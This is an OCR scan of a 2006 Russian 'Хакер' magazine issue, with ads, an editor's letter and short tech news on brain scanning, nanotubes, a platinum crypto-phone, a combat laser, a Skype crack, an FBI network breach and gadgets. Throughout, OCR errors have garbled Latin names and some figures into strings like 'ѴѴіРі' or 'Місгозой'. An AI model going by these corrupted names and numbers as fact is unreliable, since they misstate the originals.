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На правах рекламы 




Быстрая доставка 
утерянных ЗІМ-карт 




Вы можете бесплатно в течение 
15 минут получить новую $ІМ-карту 
с вашим старым номером в офисе «Билайн» 
или заказать ее доставку по телефону*. 

Избежать утраты контактов в телефонной книге 
при потере телефона возможно. Воспользуйтесь услугой 
копирования и хранения информации ЗШ-карты 
в Базе Данных «Билайн». 

Стоимость и сроки доставки, пожалуйста, уточняйте по телефону 974 88 88. 
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Я помню, в детстве я как-то сказанул бабушке, что, наверное, 
буду заниматься наукой - и она мне разочарованно сказала, 
что в науке, по ее мнению, все уже было открыто. Наивная моя 
бабушка. Вспомни, что было лет десять назад. Если комп — то 
редкость и Репііит 100. Если мобильник — то килограмм кон- 
денсаторов и выпавшие через неделю волосы. Прорыв просто 
поражает, он абсолютно во всем, в любой сфере нашей жизни. 
Г енетики растят овечек в пробирках каждый день, гигабайтную 
флешку можно купить уже за $30, а ѴѴіРі инет сейчас уже ловит- 
ся почти в любой точке внутри третьего кольца. 



Попомни мои слова — лет через пять модуль сотовой связи 
будут вживлять прямо в мозг, вместе с паспортом и кошельком. 



Я тебе больше скажу. Недавно я листал подшивку из старых 
«Хакеров» - мне прямо смешно стало, какие наивные были тог- 
да статьи. Качество, количество контента, выросло раз в пять! 
И сейчас есть четкое ощущение, что мы можем вырастить его 
еще минимум раз в десять. Столько всего нового, интересного. 
Мир вокруг меняется, и мы развиваемся вместе с ним. Ты купил 
“Хакер” и теперь не отвертишься. Будешь вместе с нами :). 

пікНог^ гл. ред. 
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Очередной Ьгаіп-Иаск 

Как ты догадываешься, заглянуть в процессы, 
происходящие в головном мозге человека до- 
вольно сложно, не говоря уже о том, чтобы со- 
ставить подробную карту мозга живого человека 
и следить за ней в реальном времени. Сегодня 
есть методы, позволяющие это сделать (магни- 
торезонансная томография, например), однако 
они очень дорогие и дают мгновенные «слепки» 
структуры мозга. Естественно, это неудобно 
врачам. Поэтому уже долгое время ведутся раз- 
работки «трехмерного» энцефалографа, кото- 
рый может отслеживать все процессы, проис- 
ходящие в головном мозге. Чтобы разрешить 
эту проблему, молодая финская компания 
Ыехзйт создала новую систему диагности- 
ки, позволяющую проводить бесконтактное 
сканирование мозга. Называется она ЫВ5 
(от английского паѵідаіеб Ьгаіп з!ітиІаііоп 
— управляемая стимуляция мозга). Эта 
система применяет метод трансчерепной 



мВ® 



магнитной стимуляции. Он заключается в исполь- 
зовании коротких магнитных импульсов, точно 
стимулирующих определенные точки коры мозга, 
а затем — в измерении реакции определенной 
зоны (или коры в целом) с помощью высокоточ- 
ной электроэнцефалограммы. То есть ЫВЗ не 
просто «смотрит», как работает мозг, а изменяет 
его деятельность магнитным полем и регистри- 
рует, каким образом нервная система начинает 
реагировать в ответ. N133 позволяет сконфигу- 
рировать диагностический процесс так, чтобы он 
давал максимально полную информацию о нару- 
шении, которое может иметься у пациента, а так- 
же следить за активностью разных отделов мозга. 
Эта аппаратура пока что используется только в 
20 учреждениях — в больницах и исследователь- 
ских центрах Японии, США и некоторых странах 
Европы. Опыт работы в этих заведениях показал, 
что еХітіа ЫВЗ — безопасное средство. Может, в 
будущем, с помощью «магнитных пальцев» N133, 
ученые смогут читать мысли пациентов. 



В период всеобщего футбольного ажиотажа сходят с ума даже ученые. 
Вот, например, немец Стефан Трелленкамп из университета Кайзер- 
слаутерна объявил о том, что с помощью нанотехнологий создал самое 
маленькое в мире футбольное поле. Нарисовал игровую площадку 
доктор Трелленкамп электронным пучком, которым нанес гравировку 
на крошечный кусочек акрилового стекла. Получившееся футбольное 
поле вышло размером всего в 500 на 380 нанометров. Сделанный объект 
настолько мал, что может быть рассмотрен только в электронный мик- 
роскоп, а на поперечном сечении человеческого волоса можно было бы 
уместить 20 тысяч таких футбольных полей. Впрочем, забава немецкого 
исследователя не так уж и бессмысленна, 
ведь его работа неплохо продемонстриро- 
вала настоящий уровень развития нанотех- 
нологий, о чем говорит размер поделки и за- 
траченное на нее время — всего один день. 



> Таким будет робомузей 

Первый в мире робомузей 

Оказывается, роботы — не такая уж техническая новинка, раз в Японс- 
ком городе Нагоя собираются открыть робомузей. Как сообщили пред- 
ставители издательского дома ОугоѴѴаІк и компании ЮІІ, занимающейся 
аукционами недвижимости, открытие «робокунсткамеры» должно со- 
стояться уже в октябре этого года. Общая площадь экспозиции, кото- 
рой дали название ВоЬоіИіпк, будет составлять 2600 квадратных метров. 
Здесь собираются разместить самые разнообразные образцы роботов 
всех времен и народов: от игрушек до промышленных образцов. Выстав- 
ка охватывает широкий спектр вопросов в области робототехники: от 
истории до объяснения достижений новейшихтехнологий. Подробности 
о том, какие конкретно экспонаты будут на витринах, не сообщаются. 
Правда, как говорят, там точно окажутся роботы с выставки ЕХРО 2005. 
Насколько будет дорогим или дешевым удовольствием посмотреть на 
наших технобратьев по разуму — пока неизвестно. Но ожидаемое еже- 
годное количество посетителей уже оценивают в 400 тысяч человек. 



> Если выпустить на это поле футбо- 
листов, размер которых составляет 1 0 
нанометров, то можно даже сыграть 
игру! 
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Двигайся в ногу со временем! 
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Одноядерный процессор - это вчерашний день! 
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>Отдельные нейроны соединены на- 
нотрубками 





> Отдельные участ- 
ки чипа, обменива- 
ющиеся благодаря 
магнитным полям 



СКАЖИ НЕТ ПРОВОДНИКАМ! 



Мозг из нанотрубок 

Нехило было бы сделать протез мозга, который 
улучшал бы его работу или, к примеру, увели- 
чивал память. Несмотря на успешное развитие 
электронных мозговых чипов, первые серьез- 
ные шаги на этом поприще сделали в «орга- 
ническом» исполнении. Недавно учеными из 
Тель-Авива был сконструирован нейрочип, 
в котором клетки самоорганизуются и сами 
создают сложные разветвленные нейронные 
связи между собой. Это уже можно смело назы- 
вать зачатками искусственного органического 
мозга. Для того чтобы нервные клетки крысы 
как можно быстрее сформировали нейронную 
сеть, ученые использовали остроумный подход: 
от одной клетки кдругой были перекинуты «мос- 
тики» из пучков углеродных нанотрубок длиной 
около 100 микрон. Культура клеток разме- 
щалась в кварцевой пластине, которая 
не содержала микроэлектронных ком- 
понентов. Нейроны не присоединя- 
лись к этой поверхности, зато благо- 
даря нанотрубкам начали собираться 
в кластеры. Такие кластеры образуют от 
20 до 1 00 клеток в составе ! Т о есть клетки ис- 
пользовали нанотрубки как своего рода «леса» 
для постройки сложной кластерной структуры. 
Кроме того, отдельные кластеры начали фор- 
мировать аксоны и дендриты в направлении 
других кластеров. Самое интересное, что клас- 
теры проявляют электрическую активность, 
свойственную нервным клеткам. А нанотрубки 
только упрощают электрический контакт меж- 
ду отдельными клетками. 



Оказывается, есть техническая возможность заменить внутренние дорожки проводников внут- 
ри чипов и микропроцессоров радиочастотной связью наподобие ѴѴі-Рі. Представь себе, как это 
круто, когда внутри процессора отдельные микросхемы передают и получают данные с помощью 
магнитных полей! Первые шаги навстречу беспроводным «внутричиповым» интерфейсам поло- 
жили ученые из британского университета города Бат. Проект с бюджетом $1 миллион рассчитан 
на три года. Информация будет передаваться внутри чипа с помощью микроволновой энергии, 
получаемой посредством возбуждения электронов магнитными полями. Магнитные поля, в свою 
очередь, будут создаваться полупроводниками шириной всего в несколько атомов, разделенны- 
ми магнитными перегородками. В основе процесса, названного обратным электронным спиновым 
резонансом, лежит использование магнитного поля для отклонения электронов и изменения их 
магнитного момента. Электроны под воздействием магнитного поля начинают колебаться и излу- 
чать микроволновую энергию. Эта энергия используется для передачи электрических сигналов в 
свободном пространстве практически без потерь, которые неизбежны при использовании прово- 
дов. В случае успеха британцы предвидят массовый выпуск компьютеров, которые будут работать 
в 500 раз быстрее при сохранении прежних размеров. 



Криптосмартфон из платины 

Хочешь, чтобы твои разговоры по мобиле не смог никто под- 
слушать? Хочешь, чтобы мобила была не только телефо- 
ном, но и ювелирным украшением? Г отовь 1 ,3 миллиона дол- 
ларов. Именно такова стоимость нового криптосмартфона 
от российской компании «Анкорт». Телефон из платины, золо- 
та и бриллиантов создается совместно с австрийским ювелиром 
Питером Апоиссоном. Криптосмартфон российского производства 
АКІСОВТ А-7 был представлен на выставке СеВІТ 2006, которая состоя- 
лась в марте 2006 года в Г ермании. Телефон может работать в стандартном 
и в защищенном от прослушивания режимах. Режим защиты подразумевает 
шифрование речи, почты и ЗМ8-сообщений, не позволяет перехватывать и 
записывать разговоры и похищать данные. Но и на этом предприимчивые 
россияне не остановились: корпус телефона планируется выполнить из чис- 
той платины, а навигационную клавишу — из розового золота. Кроме того, 
некоторые детали телефона будут выполнены из черного дерева, покрытого 
полиэстером. Большинство клавиш новинки также будут выполнены из пла- 
тины, однако боковые кнопки, а также кнопка выключения будут изготавливаться из ограненных 
бриллиантов голубого цвета. Кроме того, корпус телефона также будут украшать бриллианты — по 
25 с каждой стороны. Как мы и говорили, стоимость «шифрованной» мобилы составит около $1 ,3 
млн. Хотя можно купить ее «лысый» аналог за более приемлемую сумму: от 3 до 1 5 тысяч долларов. 




> Бриллиантовый 
криптосмартфон 
АІМСОВТ 




РОБОТ-РАСКРАСКА ПЕЧАТАЕТСЯ НА СТРУЙНИКЕ 



На сегодняшний день есть все предпосылки к тому, что через несколько лет некоторые виды 
роботов будут изготавливаться в домашних условиях на струйных принтерах. Печать интег- 
ральных схем на принтерах уже никого не удивляет. Специальная отрасль науки и технологии 
-флекстроника — занимается разработкой и исследованием гибких микросхем, печатных плат 
и механоэлектрических систем, напечатанных на специальных принтерах. Так, на основе орга- 
нических печатных схем и ряда полимерных актюаторов ученые предложили концепцию робо- 
тов-оригами, которые после «печатания» их на специальной пленке сгибаются в опре- 
деленных направлениях, формируя готового робота. Технологический принцип: 
один лист — один робот, что очень привлекательно с производственной 
точки зрения. Таким образом, можно получить готовый продукт сра- 
зу после его разработки и тестирования прототипов. Отпа- 
дает необходимость в выполнении промежуточных опера- 
ций, что, естественно, снизит стоимость готового продукта. 
В качестве первого прототипа ученые из Беркли предлагают 
«напечатать» искусственную бабочку-робота. Она печатается 
на одном листе и после изготовления уже может летать! Названа 
подобная технология робот-оригами. 



> Напечатанный 



на принтере 
-бабочка 
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Ты в игре! 

с компьютером йЕРО Едо на базе двухъядерного процессора ІпСеІ® Репйшті® й 




РегПіипТО 

іп$Ше т 



Два ядра. 
Делай больше. 




Включи компьютер йЕРО Едо и испытай ни с чем не сравнимое 
удовольствие от нового качества твоих любимых компьютерных игр. 
Скорость, быстрота реакции, высококачественная компьютерная 
графика - первоклассный экшен и запредельный уровень адреналина. 
Это уже не игра - это новое воплощение реальности, которое стало 
доступно благодаря компьютеру ОЕРО Едо на базе двухъядерного 
процессора ІпЪеІ® Репйипл® й. 






йЕРО Едо 385 йНР 

• двухъядерный процессор ІпСеІ® РепСіит® О 805 

• чипсет ІпСеІ® 945 с высокоскоростными интерфейсами 

• сверхбыстрая память 00П2-533 ОиаІ СЬаппеІ 

• новые возможности графики РСІ Ехргезз 

• реалистичный объемный шестиканальный звук 




Компания ОЕРО СошриЪегв 

Покупай у производителя 

на ѵѵѵѵѵѵ.сіеро.ги или по тел. [495] 969-22-00 



Обозначения Іпіеі, Іпіеі Іодо, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Репііит и Репііит Іпзісіе являются товарными знаками либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі 



ее подразделениям на территории США и других стран. 



Товар сертифицировг 




» 



МЕОАЫЕѴѴ5 




Ні-ТесН библиотека по- древнему 

Помнишь, как в древнее время люди высекали книги и другие 
важные документы на каменных табличках? Если ты думал, что 
этот способ с приходом цифры устарел, то ты жестоко ошиба- 
ешься. Американская компания ІМогзат предлагает всем же- 
лающим (прежде всего организациям) создать ультраплотный 
архив самых важных документов, который сможет храниться 
без изменений тысячулет. Необычное средство хранения назы- 
вается НідІі Эепзііу Розейа (НЭ-Яозейа), что можно перевести 
как «высокоплотный розеттский камень» . Это обычный кусочек 
металла, на котором «высечены» тексты. Диск НЭ-Розейа со- 
здан и выпускается по лицензии знаменитой ядерной лабора- 
тории в Лос-Аламосе (І_оз АІатоз Ыаііопаі І_аЬогаіогу). В основе 
метода — гравировка текста и рисунков на никелевой пластине 
толщиной 6,35 миллиметра. Пластинаб на 5 сантиметров может 
содержать 1 96 тысяч страниц текста и рисунков в формате А4. 
Читать инфу можно с помощью обычного микроскопа. Г рави- 
ровка выполняется при помощи скоростного потока ионов 
галлия, направляемых специальной машиной, фокусирующей 
ионный луч. Ионы выбивают атомы металла с поверхности плас- 
тины, создавая рисунок. Компания также развила программное 
обеспечение автоматизированного управления просмотром 
при помощи микроскопа для поиска на пластине нужных фраг- 
ментов текста. Такая пластина сохранит написанное в течение 
тысячи лет. Она не боится воды и электромагнитной радиации, 
выдерживает нагрев до 500 градусов Цельсия, а также застра- 
хована от «потери» информации просто из-за устаревания 
технологии: для чтения написанного достаточно микроскопа, 
которые будут существовать и через тысячулет. 




Только недавно мы писали о том, как ІЧоіИпгор Огиттап оснастила боевым лазером 
самолет, как недавно компания объявила о стационарном защитном оружии — лазер- 
ном ПВО Зкудиагб. Все просто: вместе с радаром ставится высокомощный химичес- 
кий лазер. Как только вражеский объект попадает в поле зрения радара и отслежи- 
вается им до точки точного наведения, лазер его «поджаривает». Система Зкудиагб 
базируется науже хорошо проработанном лазере ТНЕЦсокращение отТасІісаІ НідИ 
Епегду І_азег — Тактический высокомощный лазер). Это химический лазер на фто- 
риде дейтерия. 

Все его оборудование достаточно компактно, чтобы поместиться на паре крупных ав- 
томобильных прицепов или на борту многоосных армейских грузовиков. А мощности 
луча достаточно для того, чтобы нагреть корпус и инициировать взрыв заряда и/или 
топлива в летящей тактической ракете, выпущенной из системы наподобие «Катю- 
ши». Ну и самолетам, понятно, ничего хорошего ждать от такого луча не приходится. 
Лазер такой мощный, что виден со стороны, так как часть его мощности уходит на 
нагрев пыли и водяного пара в атмосферном воздухе. По замыслу ІЧоіИпгор Огиттап, 
грузовики с этим лазером , атакже другим оборудованием, развернувшись в кратчай- 
шее время, способны создать вокруг себя защитный пузырь диаметром порядка 10 
километров. Именно в таком диапазоне данный лазер сохраняет достаточную убой- 
ную силу. Установка ПВО может быть как мобильной, так и стационарной. Вообще, 
мобильность — основное преимущество Зкудиагб. Однако такие фейерверки обой- 
дутся военным недешево — стоимость химических реагентов составляет $3 тысячи 
за один выстрел. 



ЖИВАЯ ЭЛЕКТРОСТАНЦИЯ- 

ВАМПИР 



Что нового в наш продвинутый век можно узнать о 
бактериях? Оказывается, хотя бы то, что они мо- 
гут жить в коллективе. Причем по законам джунг- 
лей. Недавно микробиолог Юрий Горби из РЫАЗ 
заметил, что микробы ЗИеѵѵапеІІа, перерабаты- 
вающие токсичные металлы, вытягивают с повер- 
хности своей мембраны тонкие жгутики. Он поду- 
мал, что такая анатомическая странность должна 
быть связана с какими-то специфическими осо- 
бенностями этих «металлоперерабатывающих» 
бактерий. Оказалось, что при переработке ме- 
таллов у этих бактерий начинается дисбаланс, 
состоявший в возникновении «лишних» электро- 
нов, а еще для нормального существования ей 
был необходим кислород. Если кислород нужен, 
а его нет — проще забрать его у «соседки». Вот 
для этого бактерии и вытягивают тонкие жгуты 
нанометровых размеров. Эти неожиданно воз- 



никающие органы исследователи оправданно 
назвали нанонитями: их толщина — от 10 до 150 
нанометров, а длина достигает порой десятков 
микрометров (в зависимости от видов бактерий). 
Впрочем, оказалось, что это даже не нанонити, а 
нанопровода: получая нужное «питание», бакте- 
рии могли освободиться от лишних электронов, 
которые перемещались бы по этим проводам. И 
если конец нити дотягивался до положительного 
иона, нужного «для пропитания», то возникала 
разность потенциалов, что приводило к движе- 
нию электронов к ионам. Юрий Горби считает, 
что важно хорошо разобраться, каким образом 
бактерии формируют свои нанопровода. В част- 
ности, неплохо бы понять, какую роль играетсре- 
да, в которой находятся микроорганизмы. Когда 
ученые узнают это, возможно, получится сделать 
батарейки на основе бактерий. 
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ХАКНУТЫЙ 

ЗКУРЕ 



На сайте ѴоірѴѴікі, посвященном ІР-телефо- 
нии, 13 июля появилась новость, что китайским 
программистам удалось реверсинженировать 
исходный код протокола Зкуре. Чарли Пагли 
— автор блога и генеральный директор компа- 
нии Ѵогіп Соттипісаііопз, — предлагающей за 
небольшие деньги плагин ѴоІР для звонков с РС 
на мобильники, связался с китайцами и даже 
попробовал их взломанную версию Зкуре. По 
его словам, качество связи оказалось хуже, 
чем у оригинала, но китайские гении обеща- 
ют вскоре доработать код. Китайцы уже пла- 
нируют лицензировать взломанный протокол 
независимым разработчикам, чтобы те могли 
создавать совместимые со Зкуре приложения, 
и юзерам не приходилось бы тратить на интер- 
нет-разговоры кучу денег. Стоит ли говорить, 
какими финансовыми потерями это может 
обернуться для разработчиков Зкуре, которые 
считаются лидерами на рынке ІР-телефонии. 
Представители компании прокомментировали 
это так: «Нам известно, что небольшая группа 
китайских инженеров заявила о взломе Зкуре. 
Но доказательств этому пока нет. Даже если 
это возможно, китайский код будет лишен всех 
функций и надежности Зкуре, которыми на- 
слаждаются более 100 миллионов человек во 
всем мире. Более того, никакой реверсинжене- 
ринг не грозит системе шифрования и целост- 
ности нашего продукта». 




Клиника для компьютерных наркоманов 

«Играешь в игры по 1 2 и более часов в день? Виртуальные девушки привлекают тебя больше, чем 
реальные красотки? Эльфийский артефактный меч 70 уровня тебе дороже всех родственников 
вместе взятых? Ты наш клиент!» Примерно такой девиз у недавно открывшейся в Амстердаме 
клиники по лечению от компьютерной зависимости. 

Это первое в Европе заведение такого рода, и далеко не всем доступное: стоимость лечения со- 
ставляет 500 евро в день! Вообще используемые методики довольно стандартные и применяются 
при лечении зависимости от алкоголя и азартных игр. Причем доктор Кит Беккер — директор 
клиники, — заверяет, что положительный результат будет, только если пациент сам этого захочет 
и будет соблюдать самоконтроль. Ведь внутренний голос будет постоянно шептать: «Поиграй в 
ѴѴогІсІ оі ѴѴагсгаІі хоть часик — ничего не случится». Особое внимание в больнице Беккера уде- 
ляют детям, так как именно их неокрепшие умы больше всего подвержены соблазну полностью 
окунуться в виртуальный мир. Например, одним из пациентов Кита является 21 -летний подросток, 
который 5 лет назад начал играть в ММОВРО — онлайновые многопользовательские РРО, — с 
тех пор он практически не выходил из дома, так как все свое время проводил за монитором. После 
курса лечения делау него, вроде бы, пошли на поправку — задротуже месяц не играет в компью- 
терные игры. Клиника Беккера не единственная в мире. Лучшим лечебным заведением подобного 
рода считается больница для игроманов в Пекине, которая со дня открытия (в 2005 году) приняла 
более 100 пациентов. Напомню, что в Азии нездоровый интерес к ММОВРО и играм особенно 
актуален. 

В общем, если последний раз ты видел солнце несколько лет назад и не пред- 
ставляешь и дня без похода в какой-нибудь данжн, то теперь 
ты знаешь, к кому обратиться. Ну а я пойду 
качать своего 6-го персона- 
жа в ѴѴогІсІ 




Билли Г ейтсу выписали штраф 

Если ты считаешь, что штраф 200 рублей за езду без аптечки — это слишком много, то как 
тебе штраф в 280 миллионов евро? Именно на столько Европейская 
антимонопольная комиссия штрафанула компанию Місгозой за 
невыполнение выдвинутых в 2004 году условий. Биллу Г ейт- 
су предписали раскрыть конкурентам всю информацию 
о ѴѴіпбоѵѵз, чтобы те могли согласовать работу своего 
софта с этой ОС. Но МісгозоІ! 2 года только отнеки- 
валась. Не подействовало даже предупреждение в 
конце 2005 года о том, что за непослушание пос- 
ледует штраф. Сумма 280,5 миллионов евро рас- 
считывалась исходя из формулы: 1,5 миллиона за 
каждый день, начиная с 16 декабря (когда Місгозой 
предупредили, что пора делиться инфой) по 20 июня. 
Говорят, компании еще повезло, так как антимоно- 
польная комиссия могла затребовать по 2 миллиона в 
день. Одним штрафом, кстати, Місгозоііне отделалает- 
ся . Комитет всерьез намерен получить полную техничес- 
кую документацию по ѴѴіпсІоѵѵз, и если старина Билли не 
выложит карты на стол до конца июля, то сумма штрафа 
может увеличиться до 3,8 миллионов евро в день. 

Напомню, что Місгозой стала первой в истории 
компанией, оштрафованной за невыпол- 
нение антимонопольного решения. 
Впервые ее штрафанули в 
марте 2004 года на 497 мил- 
лионов евро. Интересно, 
насколько еще ее хватит? 



СЕТЕВАЯ ДИАДЕМА 

В июле стали известны подробности о новом многообеща- 
ющем проекте, который финансируется рядом крупных 
компьютерных компаний и организаций, таких как Егапсе 
Теіесот, РоІізГі Теіесот, ІВМ ВезеагсН и т.д. Проект назы- 
вается Эіасіет ЕігеѵѵаІІ и представляет собой аппаратную 
защиту от ЭЭоБ-атак, рассчитанную в основном для пос- 
тавщиков широкополосного интернета. «Диадема» уста- 
навливается между сетью и провайдером, фильтруя трафик 
со всех подключенных компьютеров. Если файрвол нахо- 
дит какие-либо нарушения 
правил (например, внезап- 
ный рост трафика), то этот 
компьютер моментально 
блокируется из сети. Такой 
подход позволит затормо- 
зить или даже остановить 
атаку с компьютеров-зом- 
би. На разработку Эеасіепп 
ЕігеѵѵаІІ было затрачено поч- 
ти 4 миллиона долларов, и 
теперь работа практически 
закончена. Тестирование 
пакета защиты запланиро- 
вано на сентябрь 2006 года, 
а презентация состоится во 
Франции и Польше. 
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Владимир Владимирович об интернете 

Я понимаю, что политика тѳбѳ не намного интереснее, 
чем герои реалити-шоу «Дом 2», но иногда мнение глав- 
ных политических фигур об интернете знать надо, так как 
это может напрямую повлиять на наш рунет. Тем более, 
если это мысли самого Президента РФ. В начале июля на 
интернет-конференции Владимир Владимирович Путин 
поделился своими размышлениями о сети. «Интернет 
в настоящее время — одно из наиболее быстро расту- 
щих средств массовой информации в России. У нас нет 
никаких ограничений в этой сфере, и я считаю, что чем 
меньше ограничений в интернете, тем лучше. Несмотря 
на все негативные моменты». Интересно то, что в этом 
плане мнение президента отличается от мнения многих 
депутатов, которые считают, что в интернете должен 
царить жесткий контроль над всем. «Многие говорят, 
что надо навести порядок. Думаю, общество должно 
само решить», — продолжил Путин. Что ж, радует, что 
наш Президент придерживается такого мнения. Мне бы 
очень не хотелось, чтобы Россия превратилась в еще 
один Китай, где вся страна ходит под файрволами. 




Блоги уже юзают не только домохозяйки, студенты и компью- 
терные спецы, а кто угодно. Существуют даже бандитские 
блоги, авторами которых являются настоящие нью-йоркские 
гангстеры и уличные банды, такие как Сгірз, ВІоосІз, М8-13. 
Поделив кварталы своих городов, парни начали делить вир- 
туальные закоулки, хвастаясь в своих дневниках мафиозны- 
ми достижениями и выкладывая свои фотки с внушительны- 
ми стволами. Забавно то, что постоянными читателями таких 
блогов являются не братки, а... ФБР. Действительно, зачем 
рыскать по грязным улицам в поисках улик, когда бандиты и 
сами обо всем рассказывают на своих сетевых страницах. 
ѴѴігеб.сот взяла интервью у руководителя Национального 
центра по изучению организованной преступности Джорд- 
жа Нокса, который как раз практикует такой метод следс- 
твия. По его словам, на основе информации из бандитских 
веб-блогов уже удалось задержать несколько темных лич- 
ностей. Правда, это в основном мелкая рыбешка. Например, 
один арестованный юнец прославился тем, что намалевал 
настене местной церкви свой бандитский псевдоним. В Лос- 
Анджелесе авторов уличных граффити ловят с помощью ин- 
тернета сплошь и рядом. По мнению Джорджа Нокса, чтение 
блогов помогает сотрудникам правоохранительных органов 
понять культуру, язык и привычки преступников, что помога- 
ет в их нахождении и аресте. Так что, если зовут тебя Г анни- 
бал, а фамилия твоя Лектор, держись подальше от всяких 
там онлайновых дневников. 




Русский студент — призер Сосіе^т 

Чуть более месяца назад в Дублине прошел международный конкурс по программиро- 
ванию Собе бапгі, организованный компанией Ѳоодіе. Принять участие и побороться за 
главный приз — 10 тысяч долларов — приехали 9 тысяч компьютерных гениев с разных 
уголков мира, но до финала дошли только 50. Конкурс проводится уже не первый раз: 
стартовал он в 2003 году и имеетуже стандартные правила, атакже своих фаворитов. Для 
того чтобы попасть в финал, нужно пройти 3 отборочных тура. В первом (Собіпд Рйазе) 
участников делят на группы по 1 0 человек и предлагают решить за 75 минутЗ задачки раз- 
ных уровней сложности (язык программирования можно выбрать любой). После 5-минут- 
ного перерыва наступает СйаІІепде РИазе, 
которая длится 15 минут. Участники получа- 
ют возможность просмотреть код своих кон- 
курентов и попытаться найти в нем ошибки. 
Если ты объявишь о своей находке, и после 
запуска программа действительно окажет- 
ся багнутой, то автор получает штраф, а ты 

— бонусные 50 баллов. Зузіет Тезііпд Рйазе 

— это тестирование твоих решений на под- 
I готовленном наборе тестов, где все баллы 

/ | обнуляются, если код не проходит хотя бы 

один из тестов. 

Приятно, что в тройку лучших вошли двое россиян. Второе место занял студент МГУ Петр 
Митричев, третье — Роман Елизаров из Ленинградского института точной механики и оп- 
тики. А победителем стал полякТомаш Чайка. Вообще, Россия и Польша стал и странами- 
фаворитами, и на это повлиял не только СосЫат 2006, но и два предыдущихконкурса. А 
Петр Митричев известен своими победами в межроссийских олимпиадах и в чемпионате 
мира по спортивному программированию ТорСобег. 

Обзор Собебат 2006 и анализ заданий можно почитать на ИПр://ѵѵѵѵѵѵ.1іЬ.Ьѵ/рІаѵ70пе/зр 
пеѵѵз/аесі2006.Іп1пп . А интервью с Петром Митричевым — возможно, в одном из следую- 




щих номеров «Хакера». 



ДЫРЫ ФЕДЕРАЛЬНОГО БЮРО 
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Как у любой уважающей себя конторы, у ФБР имеется свой консультант по делам компьютерной безопасности. 
Парень там мозговитый, сотрудничает не только с Бюро, но и многими другими правительственными органи- 
зациями. Так вот, недавно, чтобы продемонстрировать уязвимости систем безопасности ФБР, Джозеф Колон 
на глазах изумленных федералов скачал из интернета нужный софт и с его помощью быстренько вломился во 
внутреннюю сеть, получив доступ к 38 тысячам паролей и аккаунту самого директора ФБР Роберта Мюллера. 
Помимо этого, в руках Колона оказались совершенно секретные документы: программа по защите свидете- 
лей, сведения контрразведки и много чего еще. «Спасибо, мисс Дурпл вас проводит», — поблагодарили люди 
в черном. И, когда за Джозефом закрылась дверь, принялись разбираться, кто виноват и что делать. В конце 
концов Бюро решило на время блокировать доступ к компьютерной системе и вложило несколько миллионов 

( баксов в анализ возможной утечки и восстановление безопасности. Интересно, все ли дыры залатали? 
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ЭЛЕКТРОННАЯ 
БУМАГА ОТ ЕРЗОЫ 

Компания Ерзоп представила свою новую разработку — элек- 
тронную бумагу формата А6 (7 дюймов по диагонали) на гибкой 
подложке. Благодаря применению фирменных решений уст- 
ройство имеет разрешение 1 536x2048 пикселей и очень узкие 
поля. Тонкий лист электронной бумаги гибок и легок, поэтому 
может быть свернут, например, в трубочку (для удобства ис- 
пользования). По словам компании-разработчика, благодаря 
уровню контрастности 10:1 на новом продукте видимость и 
уровень восприятия сравнялись с аналогичными показате- 
лями обычной бумаги. Устройство пи- 
тается от 6-ти вольт и обладает энер- 
гонезависимой памятью, в которой 
информация сохранится в любом 
случае. Компания Ерзопзаявляето 
продолжении работ и исследова- 
ний в этом направлении, так что 
возможно, в скором времени 
деревья нашей планеты пере- 
станут вырубать для создания 
бумаги. Стоит заметить, что 
толщина данного изделия 
составляет 47 мм. 



Новинки Оігес 

Ряд новой техники представила компания Оігес, чья продукция отличается хорошим 
соотношением цены и качества. Устройство Р90030 САР порадует автомобилистов: 
оно вставляется в прикуриватель и дает возможность слушать МРЗ на любой магни- 
толе. В плеер встроен РМ-тюнер, а музыка хранится на карточках 30 или ММС. Если 
девайсы для машины тебя пока интересуют мало, то приглядись к другим плеерам. На- 
пример, МР6018 — универсальное устройство. Экран в4дюймапокажеттебе музыку, 
фотки, видео и текст, записанные в самых распространенных форматах. Имеется 
и радио, с которого можно производить запись (так же как и с источников видео и 
телесигнала). Стоит заметить, что плеер выглядит очень стильно, управляется одной 
рукой, а также не имеет встроенной памяти — все хранится на картах ЗЭХММС, для 
которых есть соответствующий слот. Также среди новинок — четыре цифровые фо- 
торамки, которые смогут стать отличным подарком. 



Поиграй с хвостатым! 

Для тех, кто воспринимает мышь не просто как манипулятор, 
а как единственное спасение от виртуальных монстров, ком- 
пания А4ТесН выпустила новую серию игровых мышей Х7. В 
ней представлены каклазерные(разрешениеот600 до 2500 
фі), так и старые добрые оптические (разрешение от 400 
до 2000 фі) устройства. Варьировать разрешение очень 
просто — для этого достаточно нажать специальную кнопку 
намыши. Кстати, при сменеточности позиционирования ме- 
няется подсветка колеса прокрутки. Другой особенностью 
этих мышек является функция ЗхРіге, позволяющая, напри- 
мер, делать одним кликом три выстрела вместо одного. Ду- 
мается, настоящие виртуальные ганфайтеры это оценят. В 
линейку входят устройства с разным покрытием корпуса, но 
все они оснащаются специальным ПО для настройки всех 
функций мыши и дополнительными «ножками». Так что те- 
перь играть ты будешь по-новому! 
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Чтобы сотрудники 
не ленились 

Тем, у кого в подчинении находятся несколько 
десятков человек, а то и больше, станет прият- 
но и полезно узнать о выходе шестой версии 
программы ІРІ.НЕБРОЕЗК. Основным назна- 
чением софтины является постановка задач 
сотрудникам, сохранение истории, накопле- 
ние информации по каждой из задач, назна- 
чение ответственных и отслеживание сроков 
реакции и выполнения. Система управления 
задачами полностью берет на себя контроль 
за исполнение распоряжений, напоминая не- 
радивым сотрудникам о просроченных или не- 
выполненных поручениях. Так что теперь твой 
босс, с помощью данной программы, может в 
любой момент проверить ход выполнения свое- 
го задания. Утилита обладает возможностью 
связи с системами документооборота, имеет 
сильную техническую поддержку со стороны 
производителя , а также может работать на двух 
серверах. С другой стороны, появилась новая 
возможность побыть боссом для сотрудника, 
хакнувшего систему. 





Слушаем ТгапзсепсІ 

Эта компания, больше известная нам своими флэш-драйвами, выпустила МРЗ-плеер Т.зопіс 530, 
который обладает оригинальным дизайном и множеством функций. Он работает с форматами 
МРЗ, ѴѴАѴ и ѴѴМА, имеет встроенные радио и диктофон, а также функцию караоке. С помощью 
специальной возможности повторения можно учить иностранные слова. Емкость встроенной па- 
мяти составляет от 51 2 Мб до гигабайта, а работа от батареи длится 1 5 часов (кроме того, предус- 
мотрена функция автовыкпючения, что продлевает срок жизни одной аккумуляторной зарядке). 
Напоследок стоит отметить развитые возможности эквалайзера и легкость подключения к ПК и 
использования плеера в качестве флэшки. 



твоя энергетическая 

безопасность 



Состояние российских электросетей оставля- 
